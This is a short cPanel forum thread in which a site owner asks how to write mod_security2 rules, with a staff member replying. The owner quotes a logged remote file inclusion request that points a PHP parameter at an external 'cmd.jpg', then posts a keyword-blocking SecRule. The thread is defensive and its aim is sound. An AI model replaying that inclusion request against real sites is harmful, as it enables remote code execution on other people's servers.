The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    331
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    711
    Likes Received:
    3
    Trophy Points:
    18
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    331
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    711
    Likes Received:
    3
    Trophy Points:
    18
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    331
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
Loading...

Share This Page